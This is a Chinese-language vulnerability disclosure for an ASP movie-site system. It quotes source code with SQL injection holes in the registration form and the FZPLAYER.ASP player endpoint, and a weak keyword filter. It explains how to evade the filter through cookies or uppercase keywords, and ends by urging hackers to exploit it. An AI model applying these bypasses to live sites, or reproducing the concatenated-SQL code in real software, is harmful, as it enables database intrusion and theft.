影响版本:迅风影视系统
官方网站:

漏洞类型:SQL注入
漏洞描述:讯风影视系统存在多处SQL注入漏洞。


#1.注册处注入:

wwwroot eg eg.asp
 

<% szPath = "../../" %> <!--#include file="../conn.asp" --> /*包含了也可以绕过 请看#2*/  <!--#include file = "md5.asp"--> <%  if Request.Form("submit") <> "" then  szUserName = Request.Form("UserName")  szPassWord = Request.Form("UserPass")  szEmail = Request.Form("UserMail")  szMemo = Request.Form("UserMemo")  iPayMode = Request.Form("PayMode")  szPBQuestion = Request.Form("PBQuestion")  szPBAnswer = Request.Form("PBAnswer")  szGetCode = Trim(Request.Form("codestr"))  szSQL = "SELECT * FROM MOVIE_Users WHERE UserName=" & szUserName & " OR UserEmail=" & szEmail & ""  set rsData_User = Server.CreateObject("ADODB.Recordset")  rsData_User.Open szSQL,conn,1,3  if not rsData_User.EOF then  Response.Write "<script language=JScript>alert(你注册的用户名或电子邮件地址已经存在!);history.back();</script>"  Response.End  else  iAccount = 0 if Session("Option_RegMode") = 1 then iAccount = 10  If IsEmpty(Session("VerifyCode")) Or szGetCode <> CStr(Session("VerifyCode")) Then  Response.Write "<script language=JScript>alert(验证码不符!);documentdocument.URL=document.referrer;</script>"  Response.End  end if   if Left(szUserName, 1) = "!" then  Response.Write "<script language=JScript>alert(请不要使用非法字符注册用户!);history.back();</script>"  Response.End  end if   szSQL = "INSERT INTO MOVIE_Users(UserName,UserPass,UserRegisterTime,MovieEdate,UserEmail,UserInfo,MovieUserType,UserSign,UserBio,UserAccountStatus) " szSQLszSQL = szSQL & "VALUES(" & szUserName & "," & MD5(szPassWord) & "," & now & "," & date+30 & "," & szEmail & "," & szMemo & "," & iPayMode & "," & szPBQuestion & "," & szPBAnswer & ",1)"  conn.Execute szSQL  Response.Write "<script language=JScript>alert(恭喜 - " & szUserName & " - 您已经注册成功! );window.navigate(../index.asp);</script>"  Response.End  end if  rsData_User.Close  end if    UserName,UserPass,UserRegisterTime,MovieEdate,UserEmail,UserInfo,MovieUserType,UserSign,UserBio,UserAccountStatus   等等变量都经过很鸡肋的防注入过滤就insert进movie_user里面 一切都是防注入惹的祸
wwwroot/Conn.asp

<%  Response.Addheader "Content-Type","text/html; charset=GB2312"   Response.Buffer=True Server.ScriptTimeOut=9999999 防注入  if nochecksqlin<>1 then  dim sql_injdata,SQL_inj,SQL_Get  SQL_injdata = "|exec |delete |insert | update |select " SQL_inj = split(SQL_Injdata,"|")   If Request.QueryString<>"" Then  For Each SQL_Get In Request.QueryString  For SQL_Data=0 To Ubound(SQL_inj)  if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then  Response.Write "<Script Language=javascript>alert(请不要在参数中包含非法字符尝试注入!);history.back(-1)</Script>"  Response.end  end if  next  Next  End If   If Request.Form<>"" Then  For Each Sql_Post In Request.Form  For SQL_Data=0 To Ubound(SQL_inj)  if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then  Response.Write "<Script Language=javascript>alert(请不要在参数中包含非法字符尝试注入! );history.back(-1)</Script>"  Response.end  end if  next  next  end if  end if  %> 
#2.1 防get 防post 就是没防cookies注入

利用在wwwroot/FZPLAYER.ASP处:
 

<!--#include file="conn.asp"--> <%  Progid=Request("progid")  Set Rs=CreateObject("Adodb.RecordSet")  Rs.Open "Select * From Movie_FileList Where FileListID="&progid,Conn,1,1  Response.Write "<?xml version=1.0 encoding=GB2312 ?><webplayer><Param ServerMode=2></Param><Param UserName=unknow></Param><Param UserID=1></Param><Param PlayMode=1></Param><Param PlayModeValue=" & progid & "></Param><Param ChannelID=" & progid & "></Param><Param ServerHost=" & Rs("FileMd5") & "></Param><Param Session=1></Param><Param ProtocolType=1></Param><Param EmbedMode=1></Param><Param ProgName=1></Param><Param PlayInExe=1></Param></webplayer>"  Rs.Close  %> #2.2
SQL_injdata = "|exec |delete |insert | update |select "
SQL_inj = split(SQL_Injdata,"|")

过滤的关键字少是一回事 主要是大小写都没注意到。 Exec这样的就可以绕过防注入 大摇大摆的注入吧各位黑阔